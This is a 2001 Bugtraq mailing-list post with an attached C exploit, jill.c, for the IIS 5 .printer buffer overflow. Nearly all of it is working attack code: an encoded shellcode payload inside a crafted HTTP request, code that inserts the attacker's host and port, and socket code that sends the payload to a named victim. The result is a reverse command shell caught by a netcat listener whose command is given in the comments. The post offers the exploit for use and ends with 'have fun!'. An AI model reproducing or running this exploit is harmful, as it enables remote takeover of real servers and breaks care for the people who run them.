IIS 5 remote exploit.
Date: Thu, 3 May 2001 23:08:38 +1200
From: dark spyrit <dspyrit@BEAVUH.ORG>
To: BUGTRAQ@SECURITYFOCUS.COM
Subject: IIS 5 remote exploit.
This is a multi-part message in MIME format.
------=_NextPart_000_0756_01C0D425.FC967090
Content-Type: text/plain;
charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
Here's an exploit for the IIS 5 hole.. will give you a remote command
shell, reverse telnet style.
We've only had a chance to test this on a couple of hosts, it should work
fine - if not, drop me a mail and I'll see what I can do to remedy the
situation.
Read the comments for more info.
dark spyrit/beavuh.
------=_NextPart_000_0756_01C0D425.FC967090
Content-Type: application/octet-stream;
name="jill.c"
Content-Transfer-Encoding: quoted-printable
Content-Disposition: attachment;
filename="jill.c"
/* IIS 5 remote .printer overflow. "jill.c" (don't ask).=0A=
*=0A=
* by: dark spyrit <dspyrit@beavuh.org>=0A=
*=0A=
* respect to eeye for finding this one - nice work.=0A=
* shouts to halvar, neofight and the beavuh bitchez.=0A=
*=0A=
* this exploit overwrites an exception frame to control eip and get to=0A=
* our code.. the code then locates the pointer to our larger buffer and=0A=
* execs.=0A=
*=0A=
* usage: jill <victim host> <victim port> <attacker host> <attacker =
port>=0A=
*=0A=
* the shellcode spawns a reverse cmd shell.. so you need to set up a=0A=
* netcat listener on the host you control.=0A=
*=0A=
* Ex: nc -l -p <attacker port> -vv=0A=
*=0A=
* I haven't slept in years.=0A=
*/=0A=
=0A=
#include <sys/types.h>=0A=
#include <sys/time.h>=0A=
#include <sys/socket.h>=0A=
#include <netinet/in.h>=0A=
#include <arpa/inet.h>=0A=
#include <unistd.h>=0A=
#include <errno.h>=0A=
#include <stdlib.h>=0A=
#include <stdio.h>=0A=
#include <string.h>=0A=
#include <fcntl.h>=0A=
#include <netdb.h>=0A=
=0A=
int main(int argc, char *argv[]){=0A=
=0A=
/* the whole request rolled into one, pretty huh? carez. */=0A=
=0A=
unsigned char sploit[]=3D=0A=
"\x47\x45\x54\x20\x2f\x4e\x55\x4c\x4c\x2e\x70\x72\x69\x6e\x74\x65\x72\x20=
"=0A=
"\x48\x54\x54\x50\x2f\x31\x2e\x30\x0d\x0a\x42\x65\x61\x76\x75\x68\x3a\x20=
"=0A=
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90=
"=0A=
"\x90\x90\xeb\x03\x5d\xeb\x05\xe8\xf8\xff\xff\xff\x83\xc5\x15\x90\x90\x90=
"=0A=
"\x8b\xc5\x33\xc9\x66\xb9\xd7\x02\x50\x80\x30\x95\x40\xe2\xfa\x2d\x95\x95=
"=0A=
"\x64\xe2\x14\xad\xd8\xcf\x05\x95\xe1\x96\xdd\x7e\x60\x7d\x95\x95\x95\x95=
"=0A=
"\xc8\x1e\x40\x14\x7f\x9a\x6b\x6a\x6a\x1e\x4d\x1e\xe6\xa9\x96\x66\x1e\xe3=
"=0A=
"\xed\x96\x66\x1e\xeb\xb5\x96\x6e\x1e\xdb\x81\xa6\x78\xc3\xc2\xc4\x1e\xaa=
"=0A=
"\x96\x6e\x1e\x67\x2c\x9b\x95\x95\x95\x66\x33\xe1\x9d\xcc\xca\x16\x52\x91=
"=0A=
"\xd0\x77\x72\xcc\xca\xcb\x1e\x58\x1e\xd3\xb1\x96\x56\x44\x74\x96\x54\xa6=
"=0A=
"\x5c\xf3\x1e\x9d\x1e\xd3\x89\x96\x56\x54\x74\x97\x96\x54\x1e\x95\x96\x56=
"=0A=
"\x1e\x67\x1e\x6b\x1e\x45\x2c\x9e\x95\x95\x95\x7d\xe1\x94\x95\x95\xa6\x55=
"=0A=
"\x39\x10\x55\xe0\x6c\xc7\xc3\x6a\xc2\x41\xcf\x1e\x4d\x2c\x93\x95\x95\x95=
"=0A=
"\x7d\xce\x94\x95\x95\x52\xd2\xf1\x99\x95\x95\x95\x52\xd2\xfd\x95\x95\x95=
"=0A=
"\x95\x52\xd2\xf9\x94\x95\x95\x95\xff\x95\x18\xd2\xf1\xc5\x18\xd2\x85\xc5=
"=0A=
"\x18\xd2\x81\xc5\x6a\xc2\x55\xff\x95\x18\xd2\xf1\xc5\x18\xd2\x8d\xc5\x18=
"=0A=
"\xd2\x89\xc5\x6a\xc2\x55\x52\xd2\xb5\xd1\x95\x95\x95\x18\xd2\xb5\xc5\x6a=
"=0A=
"\xc2\x51\x1e\xd2\x85\x1c\xd2\xc9\x1c\xd2\xf5\x1e\xd2\x89\x1c\xd2\xcd\x14=
"=0A=
"\xda\xd9\x94\x94\x95\x95\xf3\x52\xd2\xc5\x95\x95\x18\xd2\xe5\xc5\x18\xd2=
"=0A=
"\xb5\xc5\xa6\x55\xc5\xc5\xc5\xff\x94\xc5\xc5\x7d\x95\x95\x95\x95\xc8\x14=
"=0A=
"\x78\xd5\x6b\x6a\x6a\xc0\xc5\x6a\xc2\x5d\x6a\xe2\x85\x6a\xc2\x71\x6a\xe2=
"=0A=
"\x89\x6a\xc2\x71\xfd\x95\x91\x95\x95\xff\xd5\x6a\xc2\x45\x1e\x7d\xc5\xfd=
"=0A=
"\x94\x94\x95\x95\x6a\xc2\x7d\x10\x55\x9a\x10\x3f\x95\x95\x95\xa6\x55\xc5=
"=0A=
"\xd5\xc5\xd5\xc5\x6a\xc2\x79\x16\x6d\x6a\x9a\x11\x02\x95\x95\x95\x1e\x4d=
"=0A=
"\xf3\x52\x92\x97\x95\xf3\x52\xd2\x97\x8e\xac\x52\xd2\x91\x5e\x38\x4c\xb3=
"=0A=
"\xff\x85\x18\x92\xc5\xc6\x6a\xc2\x61\xff\xa7\x6a\xc2\x49\xa6\x5c\xc4\xc3=
"=0A=
"\xc4\xc4\xc4\x6a\xe2\x81\x6a\xc2\x59\x10\x55\xe1\xf5\x05\x05\x05\x05\x15=
"=0A=
"\xab\x95\xe1\xba\x05\x05\x05\x05\xff\x95\xc3\xfd\x95\x91\x95\x95\xc0\x6a=
"=0A=
"\xe2\x81\x6a\xc2\x4d\x10\x55\xe1\xd5\x05\x05\x05\x05\xff\x95\x6a\xa3\xc0=
"=0A=
"\xc6\x6a\xc2\x6d\x16\x6d\x6a\xe1\xbb\x05\x05\x05\x05\x7e\x27\xff\x95\xfd=
"=0A=
"\x95\x91\x95\x95\xc0\xc6\x6a\xc2\x69\x10\x55\xe9\x8d\x05\x05\x05\x05\xe1=
"=0A=
"\x09\xff\x95\xc3\xc5\xc0\x6a\xe2\x8d\x6a\xc2\x41\xff\xa7\x6a\xc2\x49\x7e=
"=0A=
"\x1f\xc6\x6a\xc2\x65\xff\x95\x6a\xc2\x75\xa6\x55\x39\x10\x55\xe0\x6c\xc4=
"=0A=
"\xc7\xc3\xc6\x6a\x47\xcf\xcc\x3e\x77\x7b\x56\xd2\xf0\xe1\xc5\xe7\xfa\xf6=
"=0A=
"\xd4\xf1\xf1\xe7\xf0\xe6\xe6\x95\xd9\xfa\xf4\xf1\xd9\xfc\xf7\xe7\xf4\xe7=
"=0A=
"\xec\xd4\x95\xd6\xe7\xf0\xf4\xe1\xf0\xc5\xfc\xe5\xf0\x95\xd2\xf0\xe1\xc6=
"=0A=
"\xe1\xf4\xe7\xe1\xe0\xe5\xdc\xfb\xf3\xfa\xd4\x95\xd6\xe7\xf0\xf4\xe1\xf0=
"=0A=
"\xc5\xe7\xfa\xf6\xf0\xe6\xe6\xd4\x95\xc5\xf0\xf0\xfe\xdb\xf4\xf8\xf0\xf1=
"=0A=
"\xc5\xfc\xe5\xf0\x95\xd2\xf9\xfa\xf7\xf4\xf9\xd4\xf9\xf9\xfa\xf6\x95\xc2=
"=0A=
"\xe7\xfc\xe1\xf0\xd3\xfc\xf9\xf0\x95\xc7\xf0\xf4\xf1\xd3\xfc\xf9\xf0\x95=
"=0A=
"\xc6\xf9\xf0\xf0\xe5\x95\xd0\xed\xfc\xe1\xc5\xe7\xfa\xf6\xf0\xe6\xe6\x95=
"=0A=
"\xd6\xf9\xfa\xe6\xf0\xdd\xf4\xfb\xf1\xf9\xf0\x95\xc2\xc6\xda\xd6\xde\xa6=
"=0A=
"\xa7\x95\xc2\xc6\xd4\xc6\xe1\xf4\xe7\xe1\xe0\xe5\x95\xe6\xfa\xf6\xfe\xf0=
"=0A=
"\xe1\x95\xf6\xf9\xfa\xe6\xf0\xe6\xfa\xf6\xfe\xf0\xe1\x95\xf6\xfa\xfb\xfb=
"=0A=
"\xf0\xf6\xe1\x95\xe6\xf0\xfb\xf1\x95\xe7\xf0\xf6\xe3\x95\xf6\xf8\xf1\xbb=
"=0A=
"\xf0\xed\xf0\x95\x0d\x0a\x48\x6f\x73\x74\x3a\x20\x90\x90\x90\x90\x90\x90=
"=0A=
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90=
"=0A=
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90=
"=0A=
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90=
"=0A=
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90=
"=0A=
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90=
"=0A=
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90=
"=0A=
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90=
"=0A=
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90=
"=0A=
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90=
"=0A=
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90=
"=0A=
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90=
"=0A=
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90=
"=0A=
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90=
"=0A=
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90=
"=0A=
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90=
"=0A=
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90=
"=0A=
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90=
"=0A=
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x33=
"=0A=
"\xc0\xb0\x90\x03\xd8\x8b\x03\x8b\x40\x60\x33\xdb\xb3\x24\x03\xc3\xff\xe0=
"=0A=
"\xeb\xb9\x90\x90\x05\x31\x8c\x6a\x0d\x0a\x0d\x0a";=0A=
=0A=
int s;=0A=
unsigned short int a_port;=0A=
unsigned long a_host;=0A=
struct hostent *ht;=0A=
struct sockaddr_in sin;=0A=
=0A=
printf("iis5 remote .printer overflow.\n"=0A=
"dark spyrit <dspyrit@beavuh.org> / beavuh labs.\n");=0A=
=0A=
if (argc !=3D 5){=0A=
printf("usage: %s <victimHost> <victimPort> <attackerHost> =
<attackerPort>\n",argv[0]);=0A=
exit(1);=0A=
}=0A=
=0A=
if ((ht =3D gethostbyname(argv[1])) =3D=3D 0){=0A=
herror(argv[1]);=0A=
exit(1);=0A=
}=0A=
=0A=
sin.sin_port =3D htons(atoi(argv[2]));=0A=
a_port =3D htons(atoi(argv[4]));=0A=
a_port^=3D0x9595;=0A=
=0A=
sin.sin_family =3D AF_INET;=0A=
sin.sin_addr =3D *((struct in_addr *)ht->h_addr);=0A=
=0A=
if ((ht =3D gethostbyname(argv[3])) =3D=3D 0){=0A=
herror(argv[3]);=0A=
exit(1);=0A=
}=0A=
=0A=
a_host =3D *((unsigned long *)ht->h_addr);=0A=
a_host^=3D0x95959595;=0A=
=0A=
sploit[441]=3D (a_port) & 0xff;=0A=
sploit[442]=3D (a_port >> 8) & 0xff;=0A=
=0A=
sploit[446]=3D (a_host) & 0xff;=0A=
sploit[447]=3D (a_host >> 8) & 0xff;=0A=
sploit[448]=3D (a_host >> 16) & 0xff;=0A=
sploit[449]=3D (a_host >> 24) & 0xff;=0A=
=0A=
if ((s =3D socket(AF_INET, SOCK_STREAM, 0)) =3D=3D -1){=0A=
perror("socket");=0A=
exit(1);=0A=
}=0A=
=0A=
printf("\nconnecting... \n");=0A=
=0A=
if ((connect(s, (struct sockaddr *) &sin, sizeof(sin))) =3D=3D -1){=0A=
perror("connect");=0A=
exit(1);=0A=
}=0A=
=0A=
write(s, sploit, strlen(sploit));=0A=
sleep (1);=0A=
close (s);=0A=
=0A=
printf("sent... \nyou may need to send a carriage on your listener if =
the shell doesn't appear.\nhave fun!\n");=0A=
exit(0);=0A=
} =0A=
------=_NextPart_000_0756_01C0D425.FC967090--
